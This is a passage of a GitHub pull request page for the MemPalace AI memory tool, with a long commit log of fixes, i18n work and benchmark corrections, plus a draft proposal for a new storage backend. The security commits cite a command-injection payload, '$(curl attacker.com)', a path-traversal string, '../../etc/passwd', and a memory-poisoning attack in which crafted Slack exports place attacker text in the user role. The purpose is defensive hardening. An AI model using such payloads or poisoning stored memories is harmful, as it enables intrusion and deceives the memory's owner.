cycles. Main was failing the deploy step with "Branch 'main' is not allowed to deploy to github-pages due to environment protection rules" on every release merge (v3.2.0, v3.3.0) — noise without signal, since docs weren't meant to serve from main anyway. Removes main from both the push trigger and the deploy-job guard. Develop continues to deploy as before; manual dispatch still works. * fix(status): paginate metadata fetch to support large palaces `col.get(limit=total)` causes SQLite "too many SQL variables" on palaces with >10k drawers (#802) and on older versions the hardcoded limit=10000 silently truncated the count (#850). Paginate in 5k batches using offset and aggregate wing/room counts incrementally. Also use `col.count()` for the header instead of `len(metas)` so the displayed total is always correct. Tested on a 122,686-drawer palace. Fixes #850 Related: #802, #723 * refactor: route all chromadb access through ChromaBackend Prerequisite for RFC 001 (plugin spec, #743). Removes every direct `import chromadb` outside the ChromaDB backend itself so the core modules depend only on the backend abstraction layer. Extends ChromaBackend with make_client, get_or_create_collection, delete_collection, create_collection, and backend_version. Adds update() to the BaseCollection contract. Non-backend callers (mcp_server, dedup, repair, migrate, cli) now go through the abstraction; tests patch ChromaBackend instead of chromadb. With this landed, the RFC 001 spec can be enforced and PalaceStore (#643) can ship as a plugin without touching core modules. * fix: update stale org URLs in pyproject.toml and README (#787) * fix: harden hooks against shell injection, path traversal, and arithmetic injection save_hook.sh: - Coerce stop_hook_active to strict True/False before eval to prevent command injection via crafted JSON (e.g. "$(curl attacker.com)") - Validate LAST_SAVE as plain integer with regex before bash arithmetic to prevent command substitution via poisoned state files hooks_cli.py: - Add _validate_transcript_path() that rejects paths with '..' components and non-.jsonl/.json extensions - _count_human_messages() now uses the validator, returning 0 for invalid paths instead of opening arbitrary files Tests: - Path traversal rejection (../../etc/passwd) - Wrong extension rejection (.txt, .py) - Valid path acceptance (.jsonl, .json) - Empty string handling - Shell injection in stop_hook_active field Refs: MemPalace/mempalace#809 * fix: add logging on rejected transcript paths and platform-native path test - _count_human_messages() now logs a WARNING via _log() when a non-empty transcript_path is rejected by the validator, making silent auto-save failures diagnosable via hook.log - Add test for platform-native paths (backslashes on Windows) to verify _validate_transcript_path works cross-platform - Add test verifying the warning log is emitted on rejection Refs: MemPalace/mempalace#809 * Increase visibility of fake website caution Noticed a URL ``` hXXps://www.mempalace[.]tech/ ``` Though the README currently warns, it is perhaps best to surface it at urgency level at the top of the README. * fix: use permissive validator for KG entity values (closes #455) sanitize_name rejects commas, colons, parentheses, and slashes — characters that commonly appear in knowledge graph subject/object values. Adds sanitize_kg_value for KG entity fields (subject, object, entity) while keeping sanitize_name for predicates and wing/room names. * chore: bump plugin manifests to 3.3.0 and fix owner URL Aligns marketplace.json and both plugin.json files with version.py / pyproject.toml (already at 3.3.0) so `/plugin update` reflects the v3.1.0/v3.2.0/v3.3.0 tags that had been landing without manifest bumps. Also updates marketplace.json `owner.url` from the stale github.com/milla-jovovich path to the current github.com/MemPalace org. Refs #874 * ci: add version guard to catch tag/manifest drift Fails a tag push if `vX.Y.Z` does not match `mempalace/version.py` (the single source of truth per CLAUDE.md), and fails PRs that touch any version file without keeping all five in sync (pyproject.toml, version.py, .claude-plugin/marketplace.json, .claude-plugin/plugin.json, .codex-plugin/plugin.json). Prevents the class of bug described in #874, where v3.1.0/v3.2.0/v3.3.0 tags all landed pointing at commits that still carried manifest version 3.0.14, blocking `/plugin update` for end users. Refs #874 * ci: let semver pre-release tags bypass strict manifest match Tags matching `vX.Y.Z-*` (e.g. v3.4.0-rc1, v1.0.0-beta.2) are treated as internal/staging builds. They skip the tag-vs-manifest check because pre-releases do not flow to end users via `/plugin update`, which reads the manifest on the default branch. Stable tags `vX.Y.Z` still require all five version sources to match exactly, so the protection against the #874 drift remains intact. The cross-file consistency check on PRs is unchanged — all manifests must still agree with mempalace/version.py whenever any version file moves. * fix: ship CNAME in Pages artifact to pin custom domain Adds website/public/CNAME containing `mempalaceofficial.com` so the VitePress build output always includes /CNAME in the Pages artifact. Without this, the custom-domain setting is only held in the repo's Pages API config — if it ever drifts (manual edit, org move, workflow change), the site reverts to <org>.github.io with no record in source. Note: this does not fix the current site outage. The root cause is DNS — mempalaceofficial.com has no A/AAAA/CNAME records pointing at GitHub Pages IPs. That has to be fixed at the registrar. This commit is the belt-and-suspenders so that once DNS is back, the domain is pinned in source and the next workflow refactor can't accidentally drop it. * docs: tighten SECURITY.md with real version policy and GHPVR-only channel Builds on @Yorji-Porji's draft by fixing three issues before it lands: - Replace the `< 1.0.0` placeholder table with MemPalace's actual support policy: current major (3.x) receives fixes, 2.x and earlier do not. - Remove the `[Insert Maintainer Email Here]` placeholder and the email fallback. GitHub Private Vulnerability Reporting is enabled on this repo; the policy points there exclusively so there is no risk of a researcher emailing a dead address. - Drop the meta-note ("Adjust the table above…") that was an instruction to the maintainer, not policy text. Structure, triage timelines, and credit language are kept as drafted. * fix: allow mining directories without local mempalace.yaml When no mempalace.yaml or mempal.yaml exists in the source directory, return a default config (wing = directory name, room = general) instead of calling sys.exit(1). This lets users mine any directory into their palace without requiring init first. Closes #14. * fix: remove unused sys import * fix: send missing-yaml warning to stderr and flag basename collisions Addresses review feedback on #604: - Warning now goes to stderr instead of stdout so it doesn't mix with mine progress output when users pipe stdout elsewhere. - Warning explicitly calls out that directories with the same basename will share a wing name, and suggests adding mempalace.yaml to disambiguate. Prevents silent content mixing across projects mined without yaml. * docs: name official domain and specific impostors in scam alert Replace the blanket ban on .tech/.io/.com domains with an allowlist of real MemPalace surfaces (GitHub repo, PyPI, mempalaceofficial.com) and call out mempalace.tech as the reported impostor. The blanket .com ban would have flagged mempalaceofficial.com as fake once DNS resolves (CNAME shipped in #877). Also update the April 11 follow-up section to match so the two notices no longer contradict each other. * perf: optimize regex compilation in entity extraction Move regular expression compilation to the module level in `dialect.py` to prevent repeated parsing during loop execution. Co-authored-by: igorls <[email protected]> * feat: add MEMPAL_VERBOSE toggle — developers see diaries in chat (#871) export MEMPAL_VERBOSE=true → hook blocks, agent writes diary in chat export MEMPAL_VERBOSE=false → silent background save (default) Developers need to see code and diaries being written. Regular users want zero chat clutter. Now both work. TDD: tests written first, failed, code fixed, tests pass. Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> * feat: add VSCode devcontainer matching CI environment Contributors now get a one-click dev environment that mirrors CI exactly: Python 3.11 (middle of the 3.9/3.11/3.13 matrix), ruff pinned to the same >=0.4.0,<0.5 range CI enforces, and pre-commit hooks auto-installed from the existing .pre-commit-config.yaml. Pinning ruff in post-create.sh is the load-bearing piece: pyproject only sets a floor, so without the pin the ruff extension would install 0.15.x and phantom-fail lint against CI's 0.4.x. * fix: add missing self._lock to query_relationship, timeline, stats in KnowledgeGraph * fix: replace invalid 'decision: allow' with {} in hooks Closes #872. The top-level decision field only recognizes "block". To not block, return empty JSON {}. "allow" was silently ignored by Claude Code, causing unpredictable behavior. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: add missing self._lock to KnowledgeGraph.close() TDD: test first, failed, fixed, passed. Igor fixed query_relationship/timeline/stats in an earlier commit. close() was the last method touching self._connection without holding the lock. Closes #883. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * benchmarks: add --llm-backend ollama for non-Anthropic rerank The rerank pipeline was hardcoded to Anthropic's /v1/messages. Add a backend flag so the same code path can be exercised with any OpenAI-compatible endpoint — local Ollama, Ollama Cloud, or any gateway that speaks /v1/chat/completions. Enables independent verification of the "100% with Haiku rerank" claim by running the full benchmark with a different LLM family (e.g. minimax-m2.7:cloud) and zero Anthropic dependency. Both longmemeval_bench.py and locomo_bench.py: - llm_rerank*() gain backend= / base_url= kwargs - CLI: --llm-backend {anthropic,ollama}, --llm-base-url - API key required only when backend=anthropic (diary/palace modes still require it) - Parse last integer in response (reasoning models emit multi-int output) - Fallback to message.reasoning when content is empty - Raise max_tokens to 1024 for reasoning models * benchmarks: apply ruff-format to llm_rerank (trivial line wrap) * benchmarks: add v3.3.0 reproduction results + 50/450 split Addresses #875: every internal BENCHMARKS.md claim reproduced on Linux x86_64 (v3.3.0 tag, deterministic ChromaDB embeddings, seed=42 for the LongMemEval dev/held-out split). Scorecard — all reproduce exactly: LongMemEval raw R@5 96.6% (500/500) ✅ hybrid_v4 held-out 450 R@5 98.4% (442/450) ✅ hybrid_v4 + minimax rerank R@5 99.2% (496/500) * hybrid_v4 + minimax rerank R@10 100.0% (500/500) * LoCoMo (session, top-10) raw 60.3% (1986q) ✅ hybrid v5 88.9% (1986q) ✅ ConvoMem all-categories (250 items) 92.9% ✅ MemBench all-categories (8500) 80.3% ✅ * The minimax-m2.7:cloud rerank run replicates the "100%" claim with a different LLM family (no Anthropic dependency). R@10 is a perfect reproduction; R@5 misses 4 questions that the published Haiku run caught — consistent with BENCHMARKS.md's own disclosure that hybrid_v4 includes three question-specific fixes developed by inspecting misses, i.e. teaching to the test. The committed 50/450 split is the deterministic (seed=42) split BENCHMARKS.md references but wasn't previously in the repo. Full result JSONLs include every question, every retrieved id, and every score — auditable end-to-end. * docs: slim README and move corrections/notices to docs/HISTORY.md Addresses #875. The previous README was 755 lines mixing six purposes (scam alert, hero, two mea-culpa notes, install guide, architecture explainer, API reference, file map). Rework it as a pure entry point: what MemPalace is, how to install, honest benchmark numbers, links to the website for concept/architecture documentation. Key content changes: - Drop the "highest-scoring AI memory system ever benchmarked" framing. - New tagline: "Local-first AI memory. Verbatim storage, pluggable backend, 96.6% R@5 raw on LongMemEval — zero API calls." Avoids naming a specific vector-store implementation since the backend is pluggable (see mempalace/backends/base.py). - Remove the cross-system comparison table. Retrieval recall (R@5) and end-to-end QA accuracy are different metrics and are not comparable; placing MemPalace's R@5 next to competitor QA accuracy under a single column header was a category error. - The "100%" LongMemEval headline is no longer the lead. The honest held-out figure is 98.4% R@5 on 450 unseen questions. The rerank pipeline reaches >=99% with any capable LLM (reproduced with Claude Haiku, Sonnet, and minimax-m2.7 via Ollama) — pipeline-level, not model-specific. - Benchmark reproduction commands now reference the correct repo (MemPalace/mempalace, not the defunct aya-thekeeper/mempal branch). New file: docs/HISTORY.md as the canonical home for post-launch corrections, public notices, and retractions. Contains verbatim: - 2026-04-14 note on this rewrite (links to #875) - 2026-04-11 impostor-domain notice (moved from README header) - 2026-04-07 "A Note from Milla & Ben" (moved from README body) README keeps a one-line scam-alert callout that links to docs/HISTORY.md for the full timeline. * docs(website): align mempalaceofficial.com with honest benchmarks Part of #875. Bring the VitePress site into line with the new README and the reproducibility scorecard: drop category-error comparisons, drop retracted claims, retain only metrics and caveats that survive audit. website/index.md - New tagline matches README (local-first, verbatim, pluggable backend, 96.6% R@5 raw, zero API calls). - Replace the "MemPalace hybrid 100% / Supermemory ~99% / Mastra 94.87% / Mem0 ~85%" comparison table with a single honest table showing MemPalace's own retrieval-recall numbers (raw 96.6%, hybrid v4 held-out 98.4%). Add an explicit sentence explaining why we no longer publish a cross-system table on the landing page (retrieval recall vs QA accuracy are different metrics). - Soften the "ChromaDB-powered vector search" feature blurb to be backend-agnostic, since the retrieval layer is pluggable. website/reference/benchmarks.md - Full rewrite of the retrieval-recall tables. No more "100%" headline; honest held-out 98.4% R@5 replaces it. Added the model-agnostic rerank result (99.2% R@5 / 100% R@10 with minimax-m2.7 via Ollama) to show the pipeline is not Haiku-specific. - Drop the LoCoMo "Hybrid v5 + Sonnet rerank (top-50) 100%" row. With per-conversation session counts of 19-32 and top_k=50, the retrieval stage returns every session by construction — the number measures an LLM's reading comprehension, not retrieval. - Drop the cross-system comparison tables. Link out to each project's own research page (Mastra, Mem0, Supermemory) for their published numbers and metric definitions. - Rewrite reproduction commands to use the correct repository and demonstrate the new --llm-backend ollama flag. website/concepts/the-palace.md - Remove the "+34%" row / paragraph. Wing/room filtering is standard metadata filtering in the vector store, not a novel retrieval mechanism — the April-7 note already retracted that framing; this finishes the retraction on the website where it had remained. website/guide/searching.md - Same treatment for "34% retrieval improvement". Reframe as operational scoping, not a novel boost. website/reference/contributing.md - Update the "palace structure matters" bullet to reflect the same framing: scoping-not-magic. website/concepts/knowledge-graph.md - Replace the MemPalace-vs-Zep feature matrix with a short "related work" note that links to Zep's own documentation for authoritative details on their deployment model. Avoids claims we cannot verify at source. * docs: #875 follow-up — repo surfaces + reproduction URLs + CHANGELOG Remaining in-repo surfaces carrying the same retracted or broken claims as the public pages fixed in the previous two commits. CONTRIBUTING.md - "Palace structure matters ... 34% retrieval improvement" → reframed as scoping (same rewording applied to the website equivalents). benchmarks/BENCHMARKS.md - Add a prominent "Important caveat" block at the top of the "Comparison vs Published Systems" table explaining that R@5 (retrieval recall) and QA accuracy are different metrics, with citations to Mastra, Mem0, and Supermemory's own published methodology pages. Annotate the specific competitor rows whose numbers are QA accuracy, not retrieval recall. - Annotate the `hybrid v4 + rerank 100%` row to note that the 99.4 → 100 step was tuned on 3 specific wrong answers (already disclosed further down in the doc under "Benchmark Integrity"); the honest hybrid figure is held-out 98.4%. - Fix the broken clone URL — `aya-thekeeper/mempal` no longer points at anything; now `MemPalace/mempalace`. benchmarks/README.md + benchmarks/HYBRID_MODE.md - Same clone-URL fix applied. CHANGELOG.md - Add a ### Documentation entry under [Unreleased] v3.3.0 that names #875 and summarises the scope of the rewrite. * docs+tests: fix CI after README slim (#875) The regression-guard tests added in #835 were pinned to the old README shape (tool table + file-reference table). When #897 slimmed the README and moved that content to the website, three tests started failing: TestReadmeToolsExistInCode.test_every_readme_tool_exists_in_tools_dict TestNoUnlistedTools.test_no_undocumented_tools TestReadmeDialectNotLossless.test_readme_dialect_line_not_lossless Changes in this commit: 1. Update the 3 tests to track the new canonical docs surfaces - Tool list -> website/reference/mcp-tools.md (tests parse `### \`mempalace_xxx\`` headings instead of markdown table rows). - dialect.py lossless disclaimer -> website/reference/modules.md (any line mentioning dialect.py must not also say "lossless"). 2. Fix the website to make "no undocumented tools" true Add the 10 tools that existed in TOOLS but were missing from website/reference/mcp-tools.md (create_tunnel, delete_tunnel, follow_tunnels, list_tunnels, get_drawer, list_drawers, update_drawer, hook_settings, memories_filed_away, reconnect). Page header now correctly says "all 29 MCP tools". 3. Align pre-commit ruff pin to match CI (0.4.x) .pre-commit-config.yaml was pinning ruff v0.9.0, while .github/workflows/ci.yml installs ruff>=0.4.0,<0.5. The two formatters produce incompatible output (e.g. v0.9.0 reformats `assert (x), msg` -> `assert x, (msg)` in a way v0.4.x rejects), which would cause the pre-commit hook to modify files that CI then flags as unformatted. Pinning the hook to v0.4.10 keeps the dev loop and CI in lock-step. Full suite: 887 passed, 0 failed. * fix: address i18n review issues from PR #718 Three issues flagged by bensig on the i18n PR before merge: 1. ko.json: status_drawers used {drawers} instead of {count}, causing the Korean UI to show the raw template string instead of the actual drawer count. All other 7 languages use {count}. 2. Test file was shipped inside the package at mempalace/i18n/test_i18n.py with a sys.path.insert hack. Moved to tests/test_i18n.py per the project convention in AGENTS.md. 3. Dialect.from_config() passed lang=config.get("lang") which defaults to None, causing __init__ to inherit whatever language was loaded earlier via module-level state. Now defaults to "en" explicitly so from_config is deterministic regardless of prior load_lang() calls. Added two regression tests for the ko.json fix and the state leak. * docs(cli): clarify that 'mempalace init' requires <dir> (#210) (#862) Fixes #210. The CLI requires a positional <dir> argument. Previous docs emphasized that init 'sets up ~/.mempalace/' which misled users into expecting no arguments. Now the docs show <dir> is required, offer '.' as the usage for the current directory, and reword the description so the project-directory scan is listed first. * fix: make entity_registry.research() local-only by default (#811) * fix: make entity_registry.research() local-only by default research() previously called _wikipedia_lookup() unconditionally, sending entity names to en.wikipedia.org on every uncached lookup. This violates the project's local-first and privacy-by-architecture principles documented in CLAUDE.md. Changes: - research() now returns "unknown" for uncached words by default - New allow_network=True parameter required for Wikipedia lookups - Wikipedia 404 now returns "unknown" instead of asserting "person" with 0.70 confidence, preventing entity registry poisoning - Added privacy warning docstring to _wikipedia_lookup() - Added tests for local-only default, opt-in network, 404 handling, and cache-not-persisted-on-local-only behaviour Refs: MemPalace/mempalace#809 * fix: improve research() cache read path and deduplicate test mocks - Use .get() instead of .setdefault() for cache reads in research() so the local-only path never mutates _data unnecessarily - Move .setdefault() to the network-write path only - Use result.setdefault() for word/confirmed keys to ensure consistent return shape across all _wikipedia_lookup error paths - Extract duplicated mock_result dict into _MOCK_SAOIRSE_PERSON constant shared by 3 test functions * fix: return empty status instead of error on cold-start palace (#830) (#831) tool_status() called _get_collection() with the default create=False, which throws when the ChromaDB collection does not exist yet (valid palace, zero drawers). The exception was swallowed and status returned "No palace found" even though init had completed successfully. Switching to create=True bootstraps an empty collection on first status call, matching what the write path already does. Fix suggested by @hkevinchu in the issue. * fix(searcher): guard against empty ChromaDB query results (#195) (#865) Fixes #195. When ChromaDB returns no documents (empty palace, or wing/room filter that excludes everything), it returns the shape: {"documents": [], "metadatas": [], "distances": []} Indexing `results["documents"][0]` blindly raises IndexError instead of the expected 'no results' response. Affected: searcher.search(), searcher.search_memories() (drawer + closet branches plus the total_before_filter aggregate), and Layer3.search() / Layer3.search_raw(). Adds a tiny private helper `searcher._first_or_empty(results, key)` that safely extracts the inner list, returning [] for any of: missing key, empty outer list, [None], or [[]]. layers.py imports the same helper to avoid duplicating the guard. Tests: tests/test_empty_chromadb_results.py covers all observed shapes plus a documentation-style test that pins the original IndexError so future readers understand why the helper exists. * fix(init): auto-add per-project files to .gitignore in git repos (#185) (#866) Partially addresses #185. `mempalace init <dir>` writes `mempalace.yaml` and `entities.json` into the project root. When <dir> is a git repository, those files have no default protection and risk being committed by accident — the loudest concern in the original report. This PR adds `_ensure_mempalace_files_gitignored()` which runs at the end of cmd_init: if <dir>/.git exists, append the two filenames to .gitignore (creating it if necessary) under a clearly-marked block. The helper is conservative: - only runs when <dir>/.git is present (no-op for non-git projects) - skips entries already present (no duplicates) - preserves existing .gitignore content - handles files without trailing newlines This does NOT relocate the files to ~/.mempalace/wings/<wing>/ as the issue's 'Expected' section proposes — that's a behavioral change with miner/config implications and warrants a separate design discussion. The gitignore safeguard removes the immediate risk without breaking any existing flow. Tests: 5 cases in tests/test_init_gitignore_protection.py covering no-op, fresh creation, partial append, idempotency, and missing-newline edge case. * fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225) (#864) * fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225) Fixes #225. Several transitive dependencies (chromadb, onnxruntime, posthog) print banners and warnings to stdout — sometimes at the C level — during the mcp_server import chain. Because the MCP protocol multiplexes JSON-RPC over stdio, any non-JSON output on stdout corrupted the message stream and broke Claude Desktop's parser with errors like: MCP mempalace: Unexpected token '*', "**********"... is not valid JSON MCP mempalace: Unexpected token 'E', "EP Error D"... is not valid JSON MCP mempalace: Unexpected token 'F', "Falling ba"... is not valid JSON Reproduced on Windows 11 with mempalace 3.0.0 / Python 3.10 / Claude Desktop 1.1062.0. Fix: at module load, redirect stdout to stderr at both the Python level (sys.stdout = sys.stderr) and the file-descriptor level (os.dup2(2, 1)) to catch C-level prints, while preserving the real stdout for later restore. main() calls _restore_stdout() right before entering the protocol loop so JSON-RPC responses still go to the real stdout. Adds tests/test_mcp_stdio_protection.py with three regression tests: - module-level redirect is in place after import - _restore_stdout() restores the original stdout (idempotent) - 'python -m mempalace.mcp_server' with empty stdin emits no stdout * style: reformat with ruff 0.4 (CI version) for #225 * fix(hooks): stop precompact hook from blocking compaction (#856, #858) (#863) * fix(hooks): stop precompact hook from blocking compaction The precompact hook unconditionally returned {"decision": "block"}, which in Claude Code means "cancel compaction" with no retry mechanism. This made /compact permanently broken for all plugin users. Changed hook_precompact() to mine the transcript synchronously (so data lands before compaction) and return {"decision": "allow"}. This matches the standalone bash hook in hooks/ which already uses allow. Also extracted _get_mine_dir() and _mine_sync() helpers so precompact can mine from the transcript directory, not just MEMPAL_DIR. Stop hook behavior is unchanged -- left for #673 which implements the full silent save path. Closes #856, closes #858. * fix: use empty JSON instead of invalid \"allow\" decision value Claude Code only recognizes \"block\" as a top-level decision value. \"allow\" is a permissionDecision value for PreToolUse hooks, not a valid top-level decision. The correct way to not block is to return empty JSON. Caught by #872. * feat: include created_at timestamp in search results (#846) * feat: include created_at timestamp in search results (closes #465) Surface the existing filed_at metadata as created_at in search result objects returned by search_memories(). Enables temporal reasoning over search hits without additional queries. * Feat: add fallback for missing filed_at metadata * fix: add provenance header and speaker IDs to Slack transcript imports (#815) * fix: add provenance header and speaker IDs to Slack transcript imports Slack exports are multi-party chats where no speaker is inherently the "user" or "assistant". The parser previously assigned these roles purely by position, allowing a crafted export to place attacker text in the "user" role — making it appear as the memory owner's words in all future retrieval (data poisoning via stored memory). Changes: - Add provenance header marking Slack transcripts as multi-party with positional (unverified) role assignment - Prefix each message with the original speaker ID ([U1], [U2], etc.) so downstream consumers can distinguish authors - Keep user/assistant role alternation for exchange-pair chunking compatibility with convo_miner.py Tests: - Provenance header presence and content - Speaker ID preservation in output - Attacker-first-message attribution verification Refs: MemPalace/mempalace#809 * fix: move Slack provenance to footer, sanitize speaker IDs, extract constant - Move provenance notice from header to footer to prevent it becoming a standalone ChromaDB drawer via paragraph chunking on exports with fewer than 3 exchange pairs (violates verbatim-always principle) - Sanitize speaker user_id/username: strip brackets, newlines, and control characters to prevent chunk-boundary injection via crafted Slack exports - Extract header string to _SLACK_PROVENANCE_FOOTER module constant, consistent with _TOOL_RESULT_* constants pattern; tests import it instead of duplicating the literal Refs: MemPalace/mempalace#809 * fix: restrict file permissions on sensitive palace data (#814) * fix: restrict file permissions on sensitive palace data On Linux with default umask (022), several files and directories containing personal data were created world-readable. This patch applies chmod 0o700 to directories and 0o600 to files immediately after creation, wrapped in try/except for Windows compatibility. Files hardened: - hooks_cli.py: hook_state/ directory and hook.log - entity_registry.py: entity_registry.json (names, relationships) - knowledge_graph.py: knowledge_graph.sqlite3 parent directory - exporter.py: export output directory and wing subdirectories - config.py: people_map.json (name mappings) - mcp_server.py: WAL file creation uses atomic os.open (TOCTOU fix) Refs: MemPalace/mempalace#809 * fix: avoid redundant chmod calls on hot paths - hooks_cli.py: chmod STATE_DIR and hook.log only on first creation, not on every _log() call (hooks fire on every Stop event) - exporter.py: track created wing dirs to skip redundant makedirs + chmod on the same directory across batches - mcp_server.py: remove redundant _WAL_FILE.chmod after os.open already set mode=0o600 atomically Refs: MemPalace/mempalace#809 * test: add palace_graph tunnel helper coverage Adds focused tests for explicit tunnel helpers in `mempalace/palace_graph.py`. Covered: - `_load_tunnels` - `_save_tunnels` - `create_tunnel` - `list_tunnels` - `delete_tunnel` - `follow_tunnels` * refactor(entity_detector): make multi-language extensible via i18n JSON Move all entity-detection lexical patterns (person verbs, pronouns, dialogue markers, project verbs, stopwords, candidate character class) out of hardcoded module-level constants and into the entity section of each locale's JSON in mempalace/i18n/. Adds a languages parameter to every public function so callers union patterns across the desired locales. The default stays ("en",), so all existing callers and tests behave unchanged. Also adds: - get_entity_patterns(langs) helper in mempalace/i18n/ that merges patterns across requested languages, dedupes lists, unions stopwords, and falls back to English for unknown locales - MempalaceConfig.entity_languages property + setter, with env var override (MEMPALACE_ENTITY_LANGUAGES, comma-separated) - mempalace init --lang en,pt-br flag (persists to config.json) - Per-language candidate_pattern so non-Latin scripts (Cyrillic, Devanagari, CJK) can register their own character classes instead of being silently dropped by the ASCII-only [A-Z][a-z]+ default - _build_patterns LRU cache keyed by (name, languages) so multi-language callers don't poison each other's cache slots Why now: the open language PRs (#760 ru, #773 hi, #778 id, #907 it) only add CLI strings via mempalace/i18n/. PR #156 (pt-br) is the first that needed entity_detector changes and inlined a _PTBR variant of every constant. That doesn't scale past 2-3 languages — every text gets checked against every language's patterns regardless of relevance, and candidate extraction still drops accented and non-Latin names. This PR sets the standard so future locale contributors only edit one JSON file (no Python changes), and entity detection scales linearly with how many languages a user actually enabled, not how many ship. * test: document orphan-locale recovery for _temp_locale helper * feat: add Russian language support to i18n module Add ru.json with full Russian translations for CLI strings, palace terminology, AAAK compression instruction, and regex patterns for topic/action extraction with Cyrillic character classes. No code changes needed -- the i18n module auto-discovers language files via *.json glob in the i18n directory. * feat(i18n): add entity detection section to Russian locale Cyrillic candidate/multi-word patterns, person-verb patterns (сказал, спросил, ответил, etc.), pronoun patterns, dialogue markers, direct address, and Russian stopwords. Follows the i18n entity framework from #911. * fix(i18n): apply review feedback on ru.json (#760) - mine_skip: "повторной раскопки" -> "повторной обработки" - quote_pattern: add Russian guillemet quotes «» Co-Authored-By: almirus <[email protected]> * feat(i18n): expand Russian entity stopwords with prepositions and conjunctions Adds 34 prepositions and conjunctions to reduce false positives in entity detection when these words appear sentence-initial. Co-Authored-By: almirus <[email protected]> * feat: add italian i18n support * feat: add italian entity patterns * Updated hi.json to support infra for entity,pronoun_patterns,dialogue_patterns,direct_address_pattern, project_verb_patterns and stopwords * feat(i18n): add Brazilian Portuguese locale with entity detection (closes #117) CLI strings, AAAK instruction, regex patterns, and entity section with person-verb, pronoun, dialogue, and candidate patterns for Latin+diacritics names (Joao, Ines, Angela). Follows the i18n entity framework from #911. * fix(i18n): address review feedback on pt-br.json - dialogue_patterns[0]: remove stray \" before > (fixes markdown quote matching) - entity stopwords: add 40 prepositions, conjunctions, and common words to reduce false positives - pronoun_patterns: add 2nd-person (você/vocês) and possessives (seu/sua/seus/suas) * feat(cli): add version display and version flag to CLI Introduces a version label to the command-line interface, displaying the current MemPalace version in the help text. Adds a `--version` flag to allow users to easily check the version and exit. * fix(i18n): resolve language codes case-insensitively (#927) BCP 47 language tags are case-insensitive (RFC 5646 §2.1.1) but the locale files mix conventions (pt-br.json vs zh-CN.json). On case-sensitive filesystems, '--lang PT-BR' or '--lang zh-cn' silently missed the file, _load_entity_section returned {}, and entity detection ran in English with no warning. The cache key in get_entity_patterns was built from raw input, so ('PT-BR',) and ('pt-br',) produced two distinct entries, both wrong. Add _canonical_lang(lang) that resolves any casing to the on-disk filename stem via lowercase comparison, and route load_lang, _load_entity_section, and the cache key through it. Closes #927 * fix(i18n): use Optional[str] for Python 3.9 compatibility PEP 604 union syntax (str | None) requires Python 3.10+. The project supports 3.9 per CI matrix, so use typing.Optional instead. * fix(entity_detector): script-aware word boundaries for combining-mark scripts Python's \b is a \w/non-\w transition. Devanagari vowel signs (matras) like ा ी ु are Unicode category Mc (Mark, Spacing Combining) — not \w. This means \b splits mid-word on every matra: names like अनीता (Anita) truncate to अनीत, and person-verb patterns like \bराज\s+ने\s+कहा\b never match because \b fails after the final matra of कहा. Same issue affects Arabic, Hebrew, Thai, Tamil, and every other script whose words contain combining marks. Fix: locales with combining-mark scripts declare a boundary_chars field in their entity section (e.g. "\\w\\u0900-\\u097F" for Hindi). The i18n loader replaces every \b in that locale's patterns with a script-aware lookaround that treats the declared characters as "inside-word", and pre-wraps candidate/multi_word patterns with the same boundary. Default behavior (no boundary_chars) keeps standard \b — en, pt-br, ru, it are unchanged. Changes: - mempalace/i18n/__init__…
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
Exploratory proof-of-concept for replacing ChromaDB with a bespoke storage layer designed around the palace model. Ships as a new
palace_store/package + apalace_store.compatshim that's wire-compatible withchromadb.PersistentClientfor the narrow surface mempalace uses. Opt-in viaMEMPAL_STORAGE=palace_store— default behavior is unchanged.This is a draft PR — marking for discussion before any merge consideration. The goal is to show the storage-layer design works end-to-end under the real mempalace test suite, reproduces the 96.6% LongMemEval headline byte-for-byte, and opens a runway for faster / smaller / more robust storage if the approach is worth pursuing.
Why
N × 1536 Bfor f32.Eval improvements (hybrid BM25, reranking, etc.) are deliberately out of scope for this PR. The contract is byte-equivalent retrieval quality, measurable wins on storage-layer metrics only.
Correctness
MEMPAL_STORAGE=palace_storeThe drop-in preserves mempalace's identity number (96.6% R@5) to the third decimal, and every one of the 500 LongMemEval questions places the correct session at the exact same rank in both backends.
Performance (100k drawers, 25 wings, warm pages, p50 query)
Full matrix across small (1k) → huge (1M) lives in
benchmarks/storage/. See also the standalone benchmark suite below.Design
Shard-per-wing flat brute-force. Each wing gets its own append-only fixed-stride f32 file under
vectors/{wing}.vec. The mempalace hot path is wing+room filtered search, so sharding by wing turns the wing filter into O(1) shard selection instead of O(N) HNSW post-filter. Within a shard we do exact cosine via BLASsgemv— no ANN approximation, recall is bit-equivalent to ChromaDB by construction.Room as structural int filter. Room labels live in a per-wing
int32array parallel to shard rows, backed by aroom_idsSQLite table that assigns stable ids on first use. The query path doesroom_ids == target_id(a single SIMD integer compare) instead of the previous<U128 ==string comparison that profiling showed cost 100-150 µs per query at 100k — now ~2 µs.BLAS thread limit. At mempalace shard sizes (typically 4000 rows × 384 dims per sgemv), OpenBLAS's per-call thread-spawn/sync overhead dominates compute by 3-4×. PalaceStore enters
threadpoolctl.threadpool_limits(limits=1)once at store construction (not per-query, to avoid the ~20 µs CM overhead at small scale) and holds it for the store's lifetime, restored onclose(). This is the single biggest perf knob for the f32 path. Requiresthreadpoolctl— installed via thepalace-parallelextra or falls back to a one-shot warning if missing.Opt-in shard parallelism. With
